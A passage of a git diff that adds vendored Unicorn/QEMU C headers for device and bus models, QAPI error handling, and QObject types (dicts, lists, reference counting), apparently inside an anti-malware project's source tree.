+ * TODO remove once we're there + */ + bool cannot_instantiate_with_device_add_yet; + bool hotpluggable; + + /* callbacks */ + void (*reset)(struct uc_struct *uc, DeviceState *dev); + DeviceRealize realize; + DeviceUnrealize unrealize; + + /* device state */ + const struct VMStateDescription *vmsd; + + /* Private to qdev / bus. */ + qdev_initfn init; /* TODO remove, once users are converted to realize */ + qdev_event exit; /* TODO remove, once users are converted to unrealize */ + const char *bus_type; +} DeviceClass; + +typedef struct NamedGPIOList NamedGPIOList; + +struct NamedGPIOList { + char *name; + int num_in; + int num_out; + QLIST_ENTRY(NamedGPIOList) node; +}; + +/** + * DeviceState: + * @realized: Indicates whether the device has been fully constructed. + * + * This structure should not be accessed directly. We declare it here + * so that it can be embedded in individual device state structures. + */ +struct DeviceState { + /*< private >*/ + Object parent_obj; + /*< public >*/ + + const char *id; + bool realized; + bool pending_deleted_event; + int hotplugged; + BusState *parent_bus; + QLIST_HEAD(, NamedGPIOList) gpios; + QLIST_HEAD(, BusState) child_bus; + int num_child_bus; + int instance_id_alias; + int alias_required_for_version; +}; + +#define TYPE_BUS "bus" +#define BUS(uc, obj) OBJECT_CHECK(uc, BusState, (obj), TYPE_BUS) +#define BUS_CLASS(klass) OBJECT_CLASS_CHECK(BusClass, (klass), TYPE_BUS) +#define BUS_GET_CLASS(obj) OBJECT_GET_CLASS(BusClass, (obj), TYPE_BUS) + +struct BusClass { + ObjectClass parent_class; + + /* FIXME first arg should be BusState */ + char *(*get_dev_path)(DeviceState *dev); + /* + * This callback is used to create Open Firmware device path in accordance + * with OF spec http://forthworks.com/standards/of1275.pdf. Individual bus + * bindings can be found at http://playground.sun.com/1275/bindings/. 
+ */ + char *(*get_fw_dev_path)(DeviceState *dev); + void (*reset)(BusState *bus); + BusRealize realize; + BusUnrealize unrealize; + + /* maximum devices allowed on the bus, 0: no limit. */ + int max_dev; + /* number of automatically allocated bus ids (e.g. ide.0) */ + int automatic_ids; +}; + +typedef struct BusChild { + DeviceState *child; + int index; + QTAILQ_ENTRY(BusChild) sibling; +} BusChild; + +#define QDEV_HOTPLUG_HANDLER_PROPERTY "hotplug-handler" + +/** + * BusState: + * @hotplug_device: link to a hotplug device associated with bus. + */ +struct BusState { + Object obj; + DeviceState *parent; + const char *name; + int max_index; + bool realized; + QTAILQ_HEAD(ChildrenHead, BusChild) children; + QLIST_ENTRY(BusState) sibling; +}; + +struct Property { + const char *name; + PropertyInfo *info; + int offset; + uint8_t bitnr; + uint8_t qtype; + int64_t defval; + int arrayoffset; + PropertyInfo *arrayinfo; + int arrayfieldsize; +}; + +struct PropertyInfo { + const char *name; + const char *description; + const char **enum_table; + int (*print)(DeviceState *dev, Property *prop, char *dest, size_t len); + ObjectPropertyAccessor *get; + ObjectPropertyAccessor *set; + ObjectPropertyRelease *release; +}; + +/** + * GlobalProperty: + * @user_provided: Set to true if property comes from user-provided config + * (command-line or config file). + * @used: Set to true if property was used when initializing a device. + */ +typedef struct GlobalProperty { + const char *driver; + const char *property; + const char *value; + bool user_provided; + bool used; + QTAILQ_ENTRY(GlobalProperty) next; +} GlobalProperty; + +/*** Board API. This should go away once we have a machine config file. 
***/ + +DeviceState *qdev_create(BusState *bus, const char *name); +DeviceState *qdev_try_create(BusState *bus, const char *name); +int qdev_init(DeviceState *dev) QEMU_WARN_UNUSED_RESULT; +void qdev_init_nofail(DeviceState *dev); +void qdev_set_legacy_instance_id(DeviceState *dev, int alias_id, + int required_for_version); +void qdev_unplug(DeviceState *dev, Error **errp); +void qdev_machine_creation_done(void); +bool qdev_machine_modified(void); + +BusState *qdev_get_child_bus(DeviceState *dev, const char *name); + +/*** Device API. ***/ + +/* Register device properties. */ +/* GPIO inputs also double as IRQ sinks. */ +void qdev_pass_gpios(DeviceState *dev, DeviceState *container, + const char *name); + +BusState *qdev_get_parent_bus(DeviceState *dev); + +/*** BUS API. ***/ + +DeviceState *qdev_find_recursive(BusState *bus, const char *id); + +/* Returns 0 to walk children, > 0 to skip walk, < 0 to terminate walk. */ +typedef int (qbus_walkerfn)(BusState *bus, void *opaque); +typedef int (qdev_walkerfn)(DeviceState *dev, void *opaque); + +void qbus_create_inplace(void *bus, size_t size, const char *typename_, + DeviceState *parent, const char *name); +BusState *qbus_create(const char *typename_, DeviceState *parent, const char *name); +/* Returns > 0 if either devfn or busfn skip walk somewhere in cursion, + * < 0 if either devfn or busfn terminate walk somewhere in cursion, + * 0 otherwise. */ +int qbus_walk_children(BusState *bus, + qdev_walkerfn *pre_devfn, qbus_walkerfn *pre_busfn, + qdev_walkerfn *post_devfn, qbus_walkerfn *post_busfn, + void *opaque); +int qdev_walk_children(DeviceState *dev, + qdev_walkerfn *pre_devfn, qbus_walkerfn *pre_busfn, + qdev_walkerfn *post_devfn, qbus_walkerfn *post_busfn, + void *opaque); + +void qdev_reset_all(DeviceState *dev); + +/** + * @qbus_reset_all: + * @bus: Bus to be reset. 
+ * + * Reset @bus and perform a bus-level ("hard") reset of all devices connected + * to it, including recursive processing of all buses below @bus itself. A + * hard reset means that qbus_reset_all will reset all state of the device. + * For PCI devices, for example, this will include the base address registers + * or configuration space. + */ +void qbus_reset_all(BusState *bus); +void qbus_reset_all_fn(void *opaque); + +/* This should go away once we get rid of the NULL bus hack */ +BusState *sysbus_get_default(void); + +char *qdev_get_fw_dev_path(DeviceState *dev); + +/** + * @qdev_machine_init + * + * Initialize platform devices before machine init. This is a hack until full + * support for composition is added. + */ +void qdev_machine_init(void); + +/** + * @device_reset + * + * Reset a single device (by calling the reset method). + */ +void device_reset(DeviceState *dev); + +const struct VMStateDescription *qdev_get_vmsd(DeviceState *dev); + +const char *qdev_fw_name(DeviceState *dev); + +Object *qdev_get_machine(struct uc_struct *); + +/* FIXME: make this a link<> */ +void qdev_set_parent_bus(DeviceState *dev, BusState *bus); + +extern int qdev_hotplug; + +char *qdev_get_dev_path(DeviceState *dev); + +GSList *qdev_build_hotpluggable_device_list(Object *peripheral); + +void qbus_set_hotplug_handler(BusState *bus, DeviceState *handler, + Error **errp); + +void qbus_set_bus_hotplug_handler(BusState *bus, Error **errp); + +void qdev_register_types(struct uc_struct *uc); + +void sysbus_register_types(struct uc_struct *uc); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/qdev.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/qdev.h new file mode 100644 index 0000000..85313af --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/qdev.h @@ -0,0 +1,7 @@ +#ifndef QDEV_H +#define QDEV_H + +#include "hw/hw.h" +#include "hw/qdev-core.h" + +#endif diff --git 
a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/sparc/sparc.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/sparc/sparc.h new file mode 100644 index 0000000..e478911 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/sparc/sparc.h @@ -0,0 +1,8 @@ +#ifndef HW_SPARC_H +#define HW_SPARC_H + +void sparc_cpu_register_types(void *opaque); +void leon3_machine_init(struct uc_struct *uc); +void sun4u_machine_init(struct uc_struct *uc); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/dealloc-visitor.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/dealloc-visitor.h new file mode 100644 index 0000000..cf4c36d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/dealloc-visitor.h @@ -0,0 +1,26 @@ +/* + * Dealloc Visitor + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Michael Roth <mdroth@linux.vnet.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef QAPI_DEALLOC_VISITOR_H +#define QAPI_DEALLOC_VISITOR_H + +#include "qapi/visitor.h" + +typedef struct QapiDeallocVisitor QapiDeallocVisitor; + +QapiDeallocVisitor *qapi_dealloc_visitor_new(void); +void qapi_dealloc_visitor_cleanup(QapiDeallocVisitor *d); + +Visitor *qapi_dealloc_get_visitor(QapiDeallocVisitor *v); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/error.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/error.h new file mode 100644 index 0000000..fc1cec6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/error.h @@ -0,0 +1,88 @@ +/* + * QEMU Error Objects + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2. See + * the COPYING.LIB file in the top-level directory. 
+ */ +#ifndef ERROR_H +#define ERROR_H + +#include "qemu/compiler.h" +#include "qapi-types.h" +#include "unicorn/platform.h" + +/** + * A class representing internal errors within QEMU. An error has a ErrorClass + * code and a human message. + */ +typedef struct Error Error; + +/** + * Set an indirect pointer to an error given a ErrorClass value and a + * printf-style human message. This function is not meant to be used outside + * of QEMU. + */ +void error_set(Error **errp, ErrorClass err_class, const char *fmt, ...) + GCC_FMT_ATTR(3, 4); + +/** + * Set an indirect pointer to an error given a ErrorClass value and a + * printf-style human message, followed by a strerror() string if + * @os_error is not zero. + */ +void error_set_errno(Error **errp, int os_error, ErrorClass err_class, + const char *fmt, ...) GCC_FMT_ATTR(4, 5); + +/** + * Same as error_set(), but sets a generic error + */ +#define error_setg(errp, fmt, ...) \ + error_set(errp, ERROR_CLASS_GENERIC_ERROR, fmt, ## __VA_ARGS__) +#define error_setg_errno(errp, os_error, fmt, ...) \ + error_set_errno(errp, os_error, ERROR_CLASS_GENERIC_ERROR, \ + fmt, ## __VA_ARGS__) + +/** + * Helper for open() errors + */ +void error_setg_file_open(Error **errp, int os_errno, const char *filename); + +/* + * Get the error class of an error object. + */ +ErrorClass error_get_class(const Error *err); + +/** + * Returns an exact copy of the error passed as an argument. + */ +Error *error_copy(const Error *err); + +/** + * Get a human readable representation of an error object. + */ +const char *error_get_pretty(Error *err); + +/** + * Propagate an error to an indirect pointer to an error. This function will + * always transfer ownership of the error reference and handles the case where + * dst_err is NULL correctly. Errors after the first are discarded. + */ +void error_propagate(Error **dst_errp, Error *local_err); + +/** + * Free an error object. 
+ */ +void error_free(Error *err); + +/** + * If passed to error_set and friends, abort(). + */ + +extern Error *error_abort; + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp-input-visitor.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp-input-visitor.h new file mode 100644 index 0000000..3ed499c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp-input-visitor.h @@ -0,0 +1,29 @@ +/* + * Input Visitor + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef QMP_INPUT_VISITOR_H +#define QMP_INPUT_VISITOR_H + +#include "qapi/visitor.h" +#include "qapi/qmp/qobject.h" + +typedef struct QmpInputVisitor QmpInputVisitor; + +QmpInputVisitor *qmp_input_visitor_new(QObject *obj); +QmpInputVisitor *qmp_input_visitor_new_strict(QObject *obj); + +void qmp_input_visitor_cleanup(QmpInputVisitor *v); + +Visitor *qmp_input_get_visitor(QmpInputVisitor *v); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp-output-visitor.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp-output-visitor.h new file mode 100644 index 0000000..2266770 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp-output-visitor.h @@ -0,0 +1,28 @@ +/* + * Output Visitor + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. 
+ * + */ + +#ifndef QMP_OUTPUT_VISITOR_H +#define QMP_OUTPUT_VISITOR_H + +#include "qapi/visitor.h" +#include "qapi/qmp/qobject.h" + +typedef struct QmpOutputVisitor QmpOutputVisitor; + +QmpOutputVisitor *qmp_output_visitor_new(void); +void qmp_output_visitor_cleanup(QmpOutputVisitor *v); + +QObject *qmp_output_get_qobject(QmpOutputVisitor *v); +Visitor *qmp_output_get_visitor(QmpOutputVisitor *v); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qbool.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qbool.h new file mode 100644 index 0000000..5304dc5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qbool.h @@ -0,0 +1,29 @@ +/* + * QBool Module + * + * Copyright IBM, Corp. 2009 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef QBOOL_H +#define QBOOL_H + +#include "unicorn/platform.h" +#include "qapi/qmp/qobject.h" + +typedef struct QBool { + QObject_HEAD; + int value; +} QBool; + +QBool *qbool_from_int(int value); +int qbool_get_int(const QBool *qb); +QBool *qobject_to_qbool(const QObject *obj); + +#endif /* QBOOL_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qdict.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qdict.h new file mode 100644 index 0000000..567c02f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qdict.h @@ -0,0 +1,75 @@ +/* + * QDict Module + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino <lcapitulino@redhat.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. 
+ */ + +#ifndef QDICT_H +#define QDICT_H + +#include "qapi/qmp/qobject.h" +#include "qapi/qmp/qlist.h" +#include "qemu/queue.h" +#include "unicorn/platform.h" + +#define QDICT_BUCKET_MAX 512 + +typedef struct QDictEntry { + char *key; + QObject *value; + QLIST_ENTRY(QDictEntry) next; +} QDictEntry; + +typedef struct QDict { + QObject_HEAD; + size_t size; + QLIST_HEAD(,QDictEntry) table[QDICT_BUCKET_MAX]; +} QDict; + +/* Object API */ +QDict *qdict_new(void); +const char *qdict_entry_key(const QDictEntry *entry); +QObject *qdict_entry_value(const QDictEntry *entry); +size_t qdict_size(const QDict *qdict); +void qdict_put_obj(QDict *qdict, const char *key, QObject *value); +void qdict_del(QDict *qdict, const char *key); +int qdict_haskey(const QDict *qdict, const char *key); +QObject *qdict_get(const QDict *qdict, const char *key); +QDict *qobject_to_qdict(const QObject *obj); +void qdict_iter(const QDict *qdict, + void (*iter)(const char *key, QObject *obj, void *opaque), + void *opaque); +const QDictEntry *qdict_first(const QDict *qdict); +const QDictEntry *qdict_next(const QDict *qdict, const QDictEntry *entry); + +/* Helper to qdict_put_obj(), accepts any object */ +#define qdict_put(qdict, key, obj) \ + qdict_put_obj(qdict, key, QOBJECT(obj)) + +/* High level helpers */ +double qdict_get_double(const QDict *qdict, const char *key); +int64_t qdict_get_int(const QDict *qdict, const char *key); +int qdict_get_bool(const QDict *qdict, const char *key); +QList *qdict_get_qlist(const QDict *qdict, const char *key); +QDict *qdict_get_qdict(const QDict *qdict, const char *key); +const char *qdict_get_str(const QDict *qdict, const char *key); +int64_t qdict_get_try_int(const QDict *qdict, const char *key, + int64_t def_value); +int qdict_get_try_bool(const QDict *qdict, const char *key, int def_value); +const char *qdict_get_try_str(const QDict *qdict, const char *key); + +QDict *qdict_clone_shallow(const QDict *src); +void qdict_flatten(QDict *qdict); + +void 
qdict_extract_subqdict(QDict *src, QDict **dst, const char *start); +void qdict_array_split(QDict *src, QList **dst); + +void qdict_join(QDict *dest, QDict *src, bool overwrite); + +#endif /* QDICT_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qerror.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qerror.h new file mode 100644 index 0000000..ed12abe --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qerror.h @@ -0,0 +1,155 @@ +/* + * QError Module + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino <lcapitulino@redhat.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ +#ifndef QERROR_H +#define QERROR_H + +#include "qapi/qmp/qstring.h" +#include "qapi/error.h" +#include "qapi-types.h" +#include <stdarg.h> + +typedef struct QError { + QObject_HEAD; + char *err_msg; + ErrorClass err_class; +} QError; + +QString *qerror_human(const QError *qerror); +void qerror_report(ErrorClass err_class, const char *fmt, ...) GCC_FMT_ATTR(2, 3); +void qerror_report_err(Error *err); + +/* + * QError class list + * Please keep the definitions in alphabetical order. + * Use scripts/check-qerror.sh to check. 
+ */ +#define QERR_BASE_NOT_FOUND \ + ERROR_CLASS_GENERIC_ERROR, "Base '%s' not found" + +#define QERR_BLOCK_JOB_NOT_ACTIVE \ + ERROR_CLASS_DEVICE_NOT_ACTIVE, "No active block job on device '%s'" + +#define QERR_BLOCK_JOB_NOT_READY \ + ERROR_CLASS_GENERIC_ERROR, "The active block job for device '%s' cannot be completed" + +#define QERR_BLOCK_FORMAT_FEATURE_NOT_SUPPORTED \ + ERROR_CLASS_GENERIC_ERROR, "Block format '%s' used by device '%s' does not support feature '%s'" + +#define QERR_BUS_NO_HOTPLUG \ + ERROR_CLASS_GENERIC_ERROR, "Bus '%s' does not support hotplugging" + +#define QERR_BUS_NOT_FOUND \ + ERROR_CLASS_GENERIC_ERROR, "Bus '%s' not found" + +#define QERR_COMMAND_NOT_FOUND \ + ERROR_CLASS_COMMAND_NOT_FOUND, "The command %s has not been found" + +#define QERR_DEVICE_ENCRYPTED \ + ERROR_CLASS_DEVICE_ENCRYPTED, "'%s' (%s) is encrypted" + +#define QERR_DEVICE_HAS_NO_MEDIUM \ + ERROR_CLASS_GENERIC_ERROR, "Device '%s' has no medium" + +#define QERR_DEVICE_INIT_FAILED \ + ERROR_CLASS_GENERIC_ERROR, "Device '%s' could not be initialized" + +#define QERR_DEVICE_IN_USE \ + ERROR_CLASS_GENERIC_ERROR, "Device '%s' is in use" + +#define QERR_DEVICE_IS_READ_ONLY \ + ERROR_CLASS_GENERIC_ERROR, "Device '%s' is read only" + +#define QERR_DEVICE_NO_HOTPLUG \ + ERROR_CLASS_GENERIC_ERROR, "Device '%s' does not support hotplugging" + +#define QERR_DEVICE_NOT_ACTIVE \ + ERROR_CLASS_DEVICE_NOT_ACTIVE, "No %s device has been activated" + +#define QERR_DEVICE_NOT_ENCRYPTED \ + ERROR_CLASS_GENERIC_ERROR, "Device '%s' is not encrypted" + +#define QERR_DEVICE_NOT_FOUND \ + ERROR_CLASS_DEVICE_NOT_FOUND, "Device '%s' not found" + +#define QERR_FD_NOT_FOUND \ + ERROR_CLASS_GENERIC_ERROR, "File descriptor named '%s' not found" + +#define QERR_FD_NOT_SUPPLIED \ + ERROR_CLASS_GENERIC_ERROR, "No file descriptor supplied via SCM_RIGHTS" + +#define QERR_FEATURE_DISABLED \ + ERROR_CLASS_GENERIC_ERROR, "The feature '%s' is not enabled" + +#define QERR_INVALID_BLOCK_FORMAT \ + 
ERROR_CLASS_GENERIC_ERROR, "Invalid block format '%s'" + +#define QERR_INVALID_PARAMETER \ + ERROR_CLASS_GENERIC_ERROR, "Invalid parameter '%s'" + +#define QERR_INVALID_PARAMETER_TYPE \ + ERROR_CLASS_GENERIC_ERROR, "Invalid parameter type for '%s', expected: %s" + +#define QERR_INVALID_PARAMETER_VALUE \ + ERROR_CLASS_GENERIC_ERROR, "Parameter '%s' expects %s" + +#define QERR_INVALID_PASSWORD \ + ERROR_CLASS_GENERIC_ERROR, "Password incorrect" + +#define QERR_IO_ERROR \ + ERROR_CLASS_GENERIC_ERROR, "An IO error has occurred" + +#define QERR_JSON_PARSING \ + ERROR_CLASS_GENERIC_ERROR, "Invalid JSON syntax" + +#define QERR_KVM_MISSING_CAP \ + ERROR_CLASS_KVM_MISSING_CAP, "Using KVM without %s, %s unavailable" + +#define QERR_MIGRATION_ACTIVE \ + ERROR_CLASS_GENERIC_ERROR, "There's a migration process in progress" + +#define QERR_MISSING_PARAMETER \ + ERROR_CLASS_GENERIC_ERROR, "Parameter '%s' is missing" + +#define QERR_PERMISSION_DENIED \ + ERROR_CLASS_GENERIC_ERROR, "Insufficient permission to perform this operation" + +#define QERR_PROPERTY_VALUE_BAD \ + ERROR_CLASS_GENERIC_ERROR, "Property '%s.%s' doesn't take value '%s'" + +#define QERR_PROPERTY_VALUE_OUT_OF_RANGE \ + ERROR_CLASS_GENERIC_ERROR, "Property %s.%s doesn't take value %" PRId64 " (minimum: %" PRId64 ", maximum: %" PRId64 ")" + +#define QERR_QGA_COMMAND_FAILED \ + ERROR_CLASS_GENERIC_ERROR, "Guest agent command failed, error was '%s'" + +#define QERR_QMP_BAD_INPUT_OBJECT \ + ERROR_CLASS_GENERIC_ERROR, "Expected '%s' in QMP input" + +#define QERR_QMP_BAD_INPUT_OBJECT_MEMBER \ + ERROR_CLASS_GENERIC_ERROR, "QMP input object member '%s' expects '%s'" + +#define QERR_QMP_EXTRA_MEMBER \ + ERROR_CLASS_GENERIC_ERROR, "QMP input object member '%s' is unexpected" + +#define QERR_SET_PASSWD_FAILED \ + ERROR_CLASS_GENERIC_ERROR, "Could not set password" + +#define QERR_UNDEFINED_ERROR \ + ERROR_CLASS_GENERIC_ERROR, "An undefined error has occurred" + +#define QERR_UNKNOWN_BLOCK_FORMAT_FEATURE \ + 
ERROR_CLASS_GENERIC_ERROR, "'%s' uses a %s feature which is not supported by this qemu version: %s" + +#define QERR_UNSUPPORTED \ + ERROR_CLASS_GENERIC_ERROR, "this feature or command is not currently supported" + +#endif /* QERROR_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qfloat.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qfloat.h new file mode 100644 index 0000000..b068ed3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qfloat.h @@ -0,0 +1,29 @@ +/* + * QFloat Module + * + * Copyright IBM, Corp. 2009 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef QFLOAT_H +#define QFLOAT_H + +#include "unicorn/platform.h" +#include "qapi/qmp/qobject.h" + +typedef struct QFloat { + QObject_HEAD; + double value; +} QFloat; + +QFloat *qfloat_from_double(double value); +double qfloat_get_double(const QFloat *qi); +QFloat *qobject_to_qfloat(const QObject *obj); + +#endif /* QFLOAT_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qint.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qint.h new file mode 100644 index 0000000..0150b7e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qint.h @@ -0,0 +1,28 @@ +/* + * QInt Module + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino <lcapitulino@redhat.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. 
+ */ + +#ifndef QINT_H +#define QINT_H + +#include "unicorn/platform.h" +#include "qapi/qmp/qobject.h" + +typedef struct QInt { + QObject_HEAD; + int64_t value; +} QInt; + +QInt *qint_from_int(int64_t value); +int64_t qint_get_int(const QInt *qi); +QInt *qobject_to_qint(const QObject *obj); + +#endif /* QINT_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qjson.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qjson.h new file mode 100644 index 0000000..ee4d31a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qjson.h @@ -0,0 +1,29 @@ +/* + * QObject JSON integration + * + * Copyright IBM, Corp. 2009 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef QJSON_H +#define QJSON_H + +#include <stdarg.h> +#include "qemu/compiler.h" +#include "qapi/qmp/qobject.h" +#include "qapi/qmp/qstring.h" + +QObject *qobject_from_json(const char *string); +QObject *qobject_from_jsonf(const char *string, ...) GCC_FMT_ATTR(1, 2); +QObject *qobject_from_jsonv(const char *string, va_list *ap) GCC_FMT_ATTR(1, 0); + +QString *qobject_to_json(const QObject *obj); +QString *qobject_to_json_pretty(const QObject *obj); + +#endif /* QJSON_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qlist.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qlist.h new file mode 100644 index 0000000..6cc4831 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qlist.h @@ -0,0 +1,63 @@ +/* + * QList Module + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino <lcapitulino@redhat.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. 
+ */ + +#ifndef QLIST_H +#define QLIST_H + +#include "qapi/qmp/qobject.h" +#include "qemu/queue.h" + +typedef struct QListEntry { + QObject *value; + QTAILQ_ENTRY(QListEntry) next; +} QListEntry; + +typedef struct QList { + QObject_HEAD; + QTAILQ_HEAD(,QListEntry) head; +} QList; + +#define qlist_append(qlist, obj) \ + qlist_append_obj(qlist, QOBJECT(obj)) + +#define QLIST_FOREACH_ENTRY(qlist, var) \ + for ((var) = ((qlist)->head.tqh_first); \ + (var); \ + (var) = ((var)->next.tqe_next)) + +static inline QObject *qlist_entry_obj(const QListEntry *entry) +{ + return entry->value; +} + +QList *qlist_new(void); +QList *qlist_copy(QList *src); +void qlist_append_obj(QList *qlist, QObject *obj); +void qlist_iter(const QList *qlist, + void (*iter)(QObject *obj, void *opaque), void *opaque); +QObject *qlist_pop(QList *qlist); +QObject *qlist_peek(QList *qlist); +int qlist_empty(const QList *qlist); +size_t qlist_size(const QList *qlist); +QList *qobject_to_qlist(const QObject *obj); + +static inline const QListEntry *qlist_first(const QList *qlist) +{ + return QTAILQ_FIRST(&qlist->head); +} + +static inline const QListEntry *qlist_next(const QListEntry *entry) +{ + return QTAILQ_NEXT(entry, next); +} + +#endif /* QLIST_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qobject.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qobject.h new file mode 100644 index 0000000..d0bbc7c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qobject.h @@ -0,0 +1,113 @@ +/* + * QEMU Object Model. + * + * Based on ideas by Avi Kivity <avi@redhat.com> + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino <lcapitulino@redhat.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. 
+ * + * QObject Reference Counts Terminology + * ------------------------------------ + * + * - Returning references: A function that returns an object may + * return it as either a weak or a strong reference. If the reference + * is strong, you are responsible for calling QDECREF() on the reference + * when you are done. + * + * If the reference is weak, the owner of the reference may free it at + * any time in the future. Before storing the reference anywhere, you + * should call QINCREF() to make the reference strong. + * + * - Transferring ownership: when you transfer ownership of a reference + * by calling a function, you are no longer responsible for calling + * QDECREF() when the reference is no longer needed. In other words, + * when the function returns you must behave as if the reference to the + * passed object was weak. + */ +#ifndef QOBJECT_H +#define QOBJECT_H + +#include <stddef.h> +#include <assert.h> + +typedef enum { + QTYPE_NONE, + QTYPE_QINT, + QTYPE_QSTRING, + QTYPE_QDICT, + QTYPE_QLIST, + QTYPE_QFLOAT, + QTYPE_QBOOL, + QTYPE_QERROR, + QTYPE_MAX, +} qtype_code; + +struct QObject; + +typedef struct QType { + qtype_code code; + void (*destroy)(struct QObject *); +} QType; + +typedef struct QObject { + const QType *type; + size_t refcnt; +} QObject; + +/* Objects definitions must include this */ +#define QObject_HEAD \ + QObject base + +/* Get the 'base' part of an object */ +#define QOBJECT(obj) (&(obj)->base) + +/* High-level interface for qobject_incref() */ +#define QINCREF(obj) \ + qobject_incref(QOBJECT(obj)) + +/* High-level interface for qobject_decref() */ +#define QDECREF(obj) \ + qobject_decref(obj ? 
QOBJECT(obj) : NULL)
+
+/* Initialize an object to default values (single statement; args parenthesized) */
+#define QOBJECT_INIT(obj, qtype_type) do {  \
+    (obj)->base.refcnt = 1;                 \
+    (obj)->base.type = (qtype_type); } while (0)
+
+/**
+ * qobject_incref(): Increment QObject's reference count
+ */
+static inline void qobject_incref(QObject *obj)
+{
+    if (obj)
+        obj->refcnt++;
+}
+
+/**
+ * qobject_decref(): Decrement QObject's reference count, deallocate
+ * when it reaches zero
+ */
+static inline void qobject_decref(QObject *obj)
+{
+    if (obj && --obj->refcnt == 0) {
+        assert(obj->type != NULL);
+        assert(obj->type->destroy != NULL);
+        obj->type->destroy(obj);
+    }
+}
+
+/**
+ * qobject_type(): Return the QObject's type
+ */
